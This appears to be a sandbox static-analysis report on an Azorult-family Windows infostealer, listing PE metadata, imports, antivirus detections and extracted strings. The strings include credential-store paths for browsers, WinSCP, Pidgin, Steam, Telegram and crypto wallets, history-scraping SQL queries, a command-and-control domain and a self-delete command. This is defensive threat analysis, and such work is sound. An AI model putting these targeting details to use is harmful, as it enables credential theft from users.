Static | ZeroBOX

PE Compile Time

1992-06-20 07:22:17

PE Imphash

6d1f2b41411eacafcf447fc002d8cb00

PEiD Signatures

BobSoft Mini Delphi -> BoB / BobSoft

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
CODE    0x00001000       0x000196b0    0x00019800        6.18552349333
DATA    0x0001b000       0x0000066c    0x00000800        6.28777981112
BSS     0x0001c000       0x000008c5    0x00000000        0.0
.idata  0x0001d000       0x0000079e    0x00000800        4.58440849171
.rsrc   0x0001e000       0x00000060    0x00000200        3.1687017163
.reloc  0x0001f000       0x0000135c    0x00001400        6.67096123919

Resources

Name           Offset      Size        Language      Sub-language     File type
RT_GROUP_ICON  0x0001e058  0x00000006  LANG_NEUTRAL  SUBLANG_NEUTRAL  data

Imports

Library kernel32.dll:
0x41d0ec VirtualFree
0x41d0f0 VirtualAlloc
0x41d0f4 LocalFree
0x41d0f8 LocalAlloc
0x41d0fc GetTickCount
0x41d104 GetVersion
0x41d108 GetCurrentThreadId
0x41d10c WideCharToMultiByte
0x41d110 MultiByteToWideChar
0x41d114 GetThreadLocale
0x41d118 GetStartupInfoA
0x41d11c GetModuleFileNameA
0x41d120 GetLocaleInfoA
0x41d124 GetCommandLineA
0x41d128 FreeLibrary
0x41d12c ExitProcess
0x41d130 WriteFile
0x41d138 RtlUnwind
0x41d13c RaiseException
0x41d140 GetStdHandle
Library user32.dll:
0x41d148 GetKeyboardType
0x41d14c MessageBoxA
0x41d150 CharNextA
Library advapi32.dll:
0x41d158 RegQueryValueExA
0x41d15c RegOpenKeyExA
0x41d160 RegCloseKey
Library oleaut32.dll:
0x41d168 SysFreeString
0x41d16c SysReAllocStringLen
0x41d170 SysAllocStringLen
Library kernel32.dll:
0x41d178 GetModuleHandleA
Library advapi32.dll:
0x41d180 RegOpenKeyExA
0x41d184 RegEnumKeyA
0x41d188 FreeSid
Library kernel32.dll:
0x41d190 WriteFile
0x41d194 Sleep
0x41d198 LocalFree
0x41d19c LoadLibraryExW
0x41d1a0 LoadLibraryA
0x41d1a4 GlobalUnlock
0x41d1a8 GlobalLock
0x41d1ac GetTickCount
0x41d1b0 GetSystemInfo
0x41d1b4 GetProcAddress
0x41d1b8 GetModuleHandleA
0x41d1bc GetModuleFileNameA
0x41d1c0 GetFileAttributesW
0x41d1c4 GetCurrentProcessId
0x41d1c8 GetCurrentProcess
0x41d1cc FreeLibrary
0x41d1d0 FindNextFileW
0x41d1d4 FindFirstFileW
0x41d1d8 FindClose
0x41d1dc ExitProcess
0x41d1e0 DeleteFileW
0x41d1e4 CreateDirectoryW
0x41d1e8 CopyFileW
Library gdi32.dll:
0x41d1f0 SelectObject
0x41d1f4 DeleteObject
0x41d1f8 DeleteDC
0x41d1fc CreateCompatibleDC
0x41d204 BitBlt
Library user32.dll:
0x41d20c ReleaseDC
0x41d210 GetSystemMetrics
0x41d214 GetDC
0x41d218 CharToOemBuffA
Library ole32.dll:
0x41d220 OleInitialize
0x41d224 CoCreateInstance

This program must be run under Win32
.idata
@.reloc
Cardinal
StringP
WideString
TObject
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
TSwdPwd
TPwdArray
GlobalVars
GlobalVars
353E77DF-928B-4941-A631-512662F0785A3061-4E40-BBC2-3A27F641D32B-54FF-44D7-85F3-D950F519F12F
kernel32.dll
ExpandEnvironmentStringsW
GetComputerNameW
GlobalMemoryStatus
CreateFileW
GetFileSize
CloseHandle
ReadFile
GetFileAttributesW
CreateMutexA
ReleaseMutex
GetLastError
GetCurrentDirectoryW
SetEnvironmentVariableW
GetEnvironmentVariableW
SetCurrentDirectoryW
FindFirstFileW
FindNextFileW
LocalFree
GetTickCount
CopyFileW
FindClose
GlobalMemoryStatusEx
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
GetModuleFileNameW
SetDllDirectoryW
GetLocaleInfoA
GetLocalTime
GetTimeZoneInformation
RemoveDirectoryW
DeleteFileW
GetLogicalDriveStringsA
GetDriveTypeA
CreateProcessW
advapi32.dll
GetUserNameW
RegCreateKeyExW
RegQueryValueExW
RegCloseKey
RegOpenKeyExW
AllocateAndInitializeSid
LookupAccountSidA
CreateProcessAsUserW
CheckTokenMembership
RegOpenKeyW
RegEnumKeyW
RegEnumValueW
CryptAcquireContextA
CryptCreateHash
CryptHashData
CryptGetHashParam
CryptDestroyHash
CryptReleaseContext
user32.dll
EnumDisplayDevicesW
wvsprintfA
GetKeyboardLayoutList
shell32.dll
ShellExecuteExW
ntdll.dll
RtlComputeCrc32
TStringArray
GLOBALFUNC
IsWow64Process
kernel32.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Windows
WTSGetActiveConsoleSessionId
kernel32.dll
WTSQueryUserToken
wtsapi32.dll
CreateEnvironmentBlock
userenv.dll
|||<[{99C3}]>|||
MTable
MozillaBased
CryptUnprotectData
crypt32.dll
taString
uURLHistory
uIE7_decodeU
uIE7_decodeU
[($^|^$)]
InternetExplorer
PVAULT_CRED8
EdgePwds
outlookDecrU
Outlook
WinSCP
PsiPlus
<account>
</account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Pidgin
1610149366
SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
Browsers\Cookies
Browsers\History
uFileFinderU
uCoins
uCoins
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs
RGlzcGxheU5hbWU=
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxsXA==
RGlzcGxheVZlcnNpb24=
GlobalMemoryStatusEx
kernel32.dll
EnumDisplayDevicesW
user32.dll
UHJvY2Vzc29yTmFtZVN0cmluZw==
SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==
CPU Count:
GetRAM:
Video Info
uProgAndProc
Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90
kernel32.dll
UHJvY2VzczMyRmlyc3RX
UHJvY2VzczMyTmV4dFc=
a2VybmVsMzIuZGxs
MachineID :
EXE_PATH :
Windows :
Computer(Username) :
Screen:
Layouts:
LocalTime:
Zone:
[Soft]
GDIScreenShot
wcscmp
crtdll.dll
GdiplusStartup
Gdiplus.dll
GdiplusShutdown
GdipCreateBitmapFromHBITMAP
GdipGetImageEncodersSize
GdipGetImageEncoders
GdipDisposeImage
GdipSaveImageToStream
CreateStreamOnHGlobal
ole32.dll
GetHGlobalFromStream
DnsQuery_A
dnsapi.dll
https://dotbit.me/a/
wsock32.dll
WSAStartup
gethostbyname
socket
connect
closesocket
HTTP/1.0
Host:
Connection: close
User-agent:
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Content-Length:
wininet.dll
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestA
InternetReadFile
InternetCloseHandle
InternetCrackUrlA
InternetSetOptionA
Host:
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
PasswordsList.txt
scr.jpg
Files\
http://ip-api.com/json
"query":"
"countryCode":"
ip.txt
System.txt
Runtime error at 00000000
0123456789ABCDEF
pinlateofficial.xyz
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
WideCharToMultiByte
MultiByteToWideChar
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
GetModuleHandleA
advapi32.dll
RegOpenKeyExA
RegEnumKeyA
FreeSid
kernel32.dll
WriteFile
LocalFree
LoadLibraryExW
LoadLibraryA
GlobalUnlock
GlobalLock
GetTickCount
GetSystemInfo
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetFileAttributesW
GetCurrentProcessId
GetCurrentProcess
FreeLibrary
FindNextFileW
FindFirstFileW
FindClose
ExitProcess
DeleteFileW
CreateDirectoryW
CopyFileW
gdi32.dll
SelectObject
DeleteObject
DeleteDC
CreateCompatibleDC
CreateCompatibleBitmap
BitBlt
user32.dll
ReleaseDC
GetSystemMetrics
CharToOemBuffA
ole32.dll
OleInitialize
CoCreateInstance
ProductName
SOFTWARE\Microsoft\Windows NT\CurrentVersion
MachineGuid
SOFTWARE\Microsoft\Cryptography
%TEMP%\
%appdata%\
%TEMP%\
%TEMP%
Version
Software\Martin Prikryl\WinSCP 2\Sessions\
HostName
PortNumber
UserName
</jid>
\accounts.xml
%APPDATA%\.purple\accounts.xml
%TEMP%\curbuf.dat
%TEMP%
%TEMP%
%TEMP%
\Cookies
\*.txt
\*.coo
%TEMP%
%TEMP%
%TEMP%
%TEMP%
%TEMP%
\History
\places.sqlite
%APPDATA%\Skype
main.db
\main.db
SteamPath
Software\Valve\Steam
\ssfn*
\Config\*.vdf
\Config\
%APPDATA%\
\autoscan\
\Monero\
.address.txt
Software\
strDataDir
CPU Model:
%TEMP%\
%PROGRAMDATA%\
Telegram
D877F783D5*,map*
%appdata%\Telegram Desktop\tdata\
image/jpeg
%comspec%
/c %WINDIR%\system32\timeout.exe 3 & del "

Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Lmir.laiL
Elastic Windows.Trojan.Azorult
MicroWorld-eScan Trojan.PWS.Delf.INS
CMC Clean
CAT-QuickHeal Ransom.MazeIH.S12879142
Skyhigh Trojan-FSEP!FADF16A672E4
ALYac Trojan.PWS.Delf.INS
Cylance Unsafe
Zillya Trojan.Azorult.Win32.4
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanSpy:Win32/Stealer.fb81643a
K7GW Password-Stealer ( 0052f96e1 )
K7AntiVirus Password-Stealer ( 0052f96e1 )
huorong Trojan/Agent.ar
Baidu Clean
VirIT Trojan.Win32.GenusT.EFVL
Paloalto generic.ml
Symantec Infostealer.Rultazo
tehtris Generic.Malware
ESET-NOD32 Win32/PSW.Delf.OSF
APEX Malicious
Avast Win32:PWSX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender Trojan.PWS.Delf.INS
NANO-Antivirus Trojan.Win32.Stealer.fitdqk
ViRobot Trojan.Win32.Z.Delf.115200.KH
Tencent Malware.Win32.Gencirc.10b2adf1
Sophos Mal/Generic-S
F-Secure Trojan.TR/Crypt.XPACK.Gen
DrWeb Trojan.PWS.Stealer.24814
VIPRE Trojan.PWS.Delf.INS
TrendMicro TrojanSpy.Win32.COINSTEAL.SMPIS
McAfeeD Real Protect-LS!FADF16A672E4
Trapmine malicious.high.ml.score
CTX exe.trojan.stealer
Emsisoft Trojan.PWS.Delf.INS (B)
Ikarus Trojan-Spy.Azorult
FireEye Generic.mg.fadf16a672e4f4af
Jiangmin Trojan.PSW.Azorult.pr
Webroot W32.Adware.Gen
Varist W32/Delf_Troj.D.gen!Eldorado
Avira TR/Crypt.XPACK.Gen
Fortinet W32/PSW.DELF.OSF!tr
Antiy-AVL Trojan[Ransom]/Win32.Blocker
Kingsoft Win32.Trojan-Spy.Stealer.gen
Gridinsoft Ransom.Win32.Blocker.vb!s1
Xcitium Malware@#11ds6r2r544p2
Arcabit Trojan.PWS.Delf.INS
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
Microsoft Trojan:Win32/Stimilina
Google Detected
AhnLab-V3 Trojan/Win32.Delf.R260844
Acronis Clean
McAfee Trojan-FSEP!FADF16A672E4
TACHYON Clean
VBA32 BScope.TrojanPSW.Stealer
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Trojan.Win32.129865
TrendMicro-HouseCall TrojanSpy.Win32.COINSTEAL.SMPIS
Rising Stealer.AZORult!1.B7AE (CLASSIC)
Yandex Trojan.PWS.Delf!mDJ83KIjHVA
SentinelOne Static AI - Suspicious PE
MaxSecure Clean
GData Win32.Trojan-Stealer.KBot.B
AVG Win32:PWSX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Worm:Win/Psw.360a366e
No IRMA results available.